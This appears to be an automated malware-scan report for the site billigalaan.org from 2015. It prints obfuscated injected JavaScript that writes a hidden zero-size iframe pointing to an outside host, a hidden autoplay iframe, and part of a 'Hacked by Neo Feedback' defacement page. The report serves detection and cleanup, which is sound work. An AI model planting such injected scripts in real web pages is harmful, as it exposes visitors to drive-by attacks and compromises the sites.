Scanned pages/files
Request | Server response | Status |
http://billigalaan.org/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 21 Nov 2015 17:54:31 GMT Location: http://www.billigalaan.org/ Server: Apache Vary: Accept-Encoding Content-Length: 235 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.billigalaan.org/ | 200 OK Content-Length: 3460 Content-Type: text/html | suspicious |
Malicious code - confirmed by antiviruses (see below) document.write(unescape("%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%3Ciframe%20frameborder%3D%220%22%20height%3D%220%22%20src%3D%22http%3A//www.devilscafe.in%22%20%0A%0Awidth%3D%220%22%3E%3C/iframe%3E%0A%3Ca%20href%3D%22http%3A//www.devilscafe.in%22%20target%3D%22_blank%22%3E%3Cimg%20%0A%0Asrc%3D%22%22%20/%3E%22%29%29%3B%0A//--%3E%0A%3C/script%3E")); Antivirus reports:
Hidden iFrame found. size: 0x0 src: http://www.youtube.com/embed/40dt4cey0hy?&autoplay=1&rel=0&fs=0&start=7&showinfo=0&controls=0&autohide=1 <iframe width="0" height="0" src="http://www.youtube.com/embed/40dt4cey0hy?&autoplay=1&rel=0&fs=0&start=7&showinfo=0&controls=0&autohide=1" frameborder="0" allowfullscreen> Deface/Content modification. The following signature was found: Hacked by Neo Feedback <html> <head> <title>Hacked by Neo Feedback</title> <link rel="icon" href="https://aronno1920.files.wordpress.com/2015/07/neofeedback.png" type="image/x-icon"> <script language="JavaScript">var brzinakucanja=200;var pauzapor=2000;var vremeid=null;var kretanje=false;var poruka=new Array();var slporuka=0;var bezporuke=0;poruka[0]="Hacked by Neo Feedback" poruka[1]="Hacked by N30 F33D64CK" function prikaz(){var text=poruka[slporuka];if(bezp ...[3417 bytes skipped]... | ||
http://code.jquery.com/jquery-1.9.1.js | 200 OK Content-Length: 268381 Content-Type: application/javascript | clean |
http://billigalaan.org/typed.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 21 Nov 2015 17:54:33 GMT Location: http://www.billigalaan.org/typed.js Server: Apache Vary: Accept-Encoding Content-Length: 243 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.billigalaan.org/typed.js | 200 OK Content-Length: 3460 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(unescape("%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%3Ciframe%20frameborder%3D%220%22%20height%3D%220%22%20src%3D%22http%3A//www.devilscafe.in%22%20%0A%0Awidth%3D%220%22%3E%3C/iframe%3E%0A%3Ca%20href%3D%22http%3A//www.devilscafe.in%22%20target%3D%22_blank%22%3E%3Cimg%20%0A%0Asrc%3D%22%22%20/%3E%22%29%29%3B%0A//--%3E%0A%3C/script%3E")); Antivirus reports:
Hidden iFrame found. size: 0x0 src: http://www.youtube.com/embed/40dt4cey0hy?&autoplay=1&rel=0&fs=0&start=7&showinfo=0&controls=0&autohide=1 <iframe width="0" height="0" src="http://www.youtube.com/embed/40dt4cey0hy?&autoplay=1&rel=0&fs=0&start=7&showinfo=0&controls=0&autohide=1" frameborder="0" allowfullscreen> | ||
http://www.billigalaan.org/test404page.js | 200 OK Content-Length: 3460 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(unescape("%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%3Ciframe%20frameborder%3D%220%22%20height%3D%220%22%20src%3D%22http%3A//www.devilscafe.in%22%20%0A%0Awidth%3D%220%22%3E%3C/iframe%3E%0A%3Ca%20href%3D%22http%3A//www.devilscafe.in%22%20target%3D%22_blank%22%3E%3Cimg%20%0A%0Asrc%3D%22%22%20/%3E%22%29%29%3B%0A//--%3E%0A%3C/script%3E")); Antivirus reports:
Hidden iFrame found. size: 0x0 src: http://www.youtube.com/embed/40dt4cey0hy?&autoplay=1&rel=0&fs=0&start=7&showinfo=0&controls=0&autohide=1 <iframe width="0" height="0" src="http://www.youtube.com/embed/40dt4cey0hy?&autoplay=1&rel=0&fs=0&start=7&showinfo=0&controls=0&autohide=1" frameborder="0" allowfullscreen> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: billigalaan.org
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 21 Nov 2015 17:54:31 GMT
Location: http://www.billigalaan.org/
Server: Apache
Vary: Accept-Encoding
Content-Length: 235
Content-Type: text/html; charset=iso-8859-1
...235 bytes of data.
GET / HTTP/1.1
Host: billigalaan.org
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 21 Nov 2015 17:54:31 GMT
Location: http://www.billigalaan.org/
Server: Apache
Vary: Accept-Encoding
Content-Length: 235
Content-Type: text/html; charset=iso-8859-1
...235 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: billigalaan.org
Referer: http://www.google.com/search?q=billigalaan.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: billigalaan.org
Referer: http://www.google.com/search?q=billigalaan.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=billigalaan.org
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://billigalaan.org/
Result: billigalaan.org is not infected or malware details are not published yet.
Result: billigalaan.org is not infected or malware details are not published yet.